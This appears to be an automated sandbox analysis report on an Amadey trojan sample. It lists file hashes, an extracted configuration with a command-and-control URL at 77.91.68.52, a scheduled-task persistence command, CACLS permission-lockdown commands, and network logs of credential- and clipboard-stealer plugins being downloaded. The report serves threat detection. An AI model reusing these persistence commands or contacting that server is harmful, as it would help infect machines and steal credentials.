Analysis

  • max time kernel
    133s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
  • submitted
    11/10/2023, 09:53 UTC

General

  • Target

    15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e.exe

  • Size

    240KB

  • MD5

    409c5cbf20f61015a81e831f58e487a4

  • SHA1

    12487a47f634366cc6208837dbd67473878f544e

  • SHA256

    15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e

  • SHA512

    4c28929e1febcf7f0a92c999a80f6c44241f7420b714feca8dc94796a28c2859d68a5a610bc96e42931d8b6d5c723ff6a0b66a00eff6ec0897d010d5df87cc90

  • SSDEEP

    6144:V7Vj3uVUn27+6qQx41QPF2nnugMeS2SpY:xwYfQx9FOnugMeS2

Score
10/10

Malware Config

Extracted

Family

amadey

Version

3.89

C2

http://77.91.68.52/mac/index.php

Attributes
  • install_dir

    fefffe8cea

  • install_file

    explonde.exe

  • strings_key

    916aae73606d7a9e02a1d3b47c199688

  • rc4.plain

    006700e5a2ab05704bbb0c589b88924d

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious use of WriteProcessMemory 55 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e.exe
    "C:\Users\Admin\AppData\Local\Temp\15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2316
    • C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
      "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2612
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explonde.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe" /F
        3⤵
        • Creates scheduled task(s)
        PID:2664
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explonde.exe" /P "Admin:N"&&CACLS "explonde.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2948
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          4⤵
          PID:2832
        • C:\Windows\SysWOW64\cacls.exe
          CACLS "explonde.exe" /P "Admin:N"
          4⤵
          PID:2528
        • C:\Windows\SysWOW64\cacls.exe
          CACLS "explonde.exe" /P "Admin:R" /E
          4⤵
          PID:2996
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          4⤵
          PID:2784
        • C:\Windows\SysWOW64\cacls.exe
          CACLS "..\fefffe8cea" /P "Admin:N"
          4⤵
          PID:2680
        • C:\Windows\SysWOW64\cacls.exe
          CACLS "..\fefffe8cea" /P "Admin:R" /E
          4⤵
          PID:2688
      • C:\Windows\SysWOW64\rundll32.exe
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
        3⤵
        • Loads dropped DLL
        PID:2508
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {26CD5782-EEB0-420A-A9D0-65D9FA9B28AD} S-1-5-21-3849525425-30183055-657688904-1000:KGPMNUDG\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2592
    • C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
      C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
      2⤵
      • Executes dropped EXE
      PID:2920
    • C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
      C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
      2⤵
      • Executes dropped EXE
      PID:2712
    • C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
      C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
      2⤵
      • Executes dropped EXE
      PID:620

Network

  • flag-fi
    POST
    http://77.91.68.52/mac/index.php
    explonde.exe
    Remote address:
    77.91.68.52:80
    Request
    POST /mac/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 77.91.68.52
    Content-Length: 88
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Wed, 11 Oct 2023 15:33:04 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 6
    Content-Type: text/html; charset=UTF-8
  • flag-fi
    GET
    http://77.91.68.52/mac/Plugins/cred64.dll
    explonde.exe
    Remote address:
    77.91.68.52:80
    Request
    GET /mac/Plugins/cred64.dll HTTP/1.1
    Host: 77.91.68.52
    Response
    HTTP/1.1 404 Not Found
    Date: Wed, 11 Oct 2023 15:33:47 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 273
    Content-Type: text/html; charset=iso-8859-1
  • flag-fi
    GET
    http://77.91.68.52/mac/Plugins/clip64.dll
    explonde.exe
    Remote address:
    77.91.68.52:80
    Request
    GET /mac/Plugins/clip64.dll HTTP/1.1
    Host: 77.91.68.52
    Response
    HTTP/1.1 200 OK
    Date: Wed, 11 Oct 2023 15:33:47 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Last-Modified: Sat, 30 Sep 2023 10:47:01 GMT
    ETag: "16400-6069142dbc6a0"
    Accept-Ranges: bytes
    Content-Length: 91136
    Content-Type: application/x-msdos-program
  • 77.91.68.52:80
    http://77.91.68.52/mac/index.php
    http
    explonde.exe
    509 B
    365 B
    6
    5

    HTTP Request
    POST http://77.91.68.52/mac/index.php
    HTTP Response
    200
  • 77.91.68.52:80
    http://77.91.68.52/mac/Plugins/clip64.dll
    http
    explonde.exe
    3.6kB
    94.8kB
    69
    75

    HTTP Request
    GET http://77.91.68.52/mac/Plugins/cred64.dll
    HTTP Response
    404

    HTTP Request
    GET http://77.91.68.52/mac/Plugins/clip64.dll
    HTTP Response
    200
Downloads

  • C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe

    Filesize
    240KB
    MD5
    409c5cbf20f61015a81e831f58e487a4
    SHA1
    12487a47f634366cc6208837dbd67473878f544e
    SHA256
    15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e
    SHA512
    4c28929e1febcf7f0a92c999a80f6c44241f7420b714feca8dc94796a28c2859d68a5a610bc96e42931d8b6d5c723ff6a0b66a00eff6ec0897d010d5df87cc90

  • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

    Filesize
    89KB
    MD5
    2ac6d3fcf6913b1a1ac100407e97fccb
    SHA1
    809f7d4ed348951b79745074487956255d1d0a9a
    SHA256
    30f0f0631054f194553a9b8700f2db747cb167490201a43c0767644d77870dbe
    SHA512
    79ebf87dccce1a0b7f892473dfb1c0bff5908840e80bbda44235a7a568993a76b661b81db6597798ec6e978dc441dd7108583367ffdc57224e40d0bd0efe93b6

  • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

    Filesize
    273B
    MD5
    0c459e65bcc6d38574f0c0d63a87088a
    SHA1
    41e53d5f2b3e7ca859b842a1c7b677e0847e6d65
    SHA256
    871c61d5f7051d6ddcf787e92e92d9c7e36747e64ea17b8cffccac549196abc4
    SHA512
    be1ca1fa525dfea57bc14ba41d25fb904c8e4c1d5cb4a5981d3173143620fb8e08277c0dfc2287b792e365871cc6805034377060a84cfef81969cd3d3ba8f90d

  • \Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe

    Filesize
    240KB
    MD5
    409c5cbf20f61015a81e831f58e487a4
    SHA1
    12487a47f634366cc6208837dbd67473878f544e
    SHA256
    15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e
    SHA512
    4c28929e1febcf7f0a92c999a80f6c44241f7420b714feca8dc94796a28c2859d68a5a610bc96e42931d8b6d5c723ff6a0b66a00eff6ec0897d010d5df87cc90

  • \Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

    Filesize
    89KB
    MD5
    2ac6d3fcf6913b1a1ac100407e97fccb
    SHA1
    809f7d4ed348951b79745074487956255d1d0a9a
    SHA256
    30f0f0631054f194553a9b8700f2db747cb167490201a43c0767644d77870dbe
    SHA512
    79ebf87dccce1a0b7f892473dfb1c0bff5908840e80bbda44235a7a568993a76b661b81db6597798ec6e978dc441dd7108583367ffdc57224e40d0bd0efe93b6
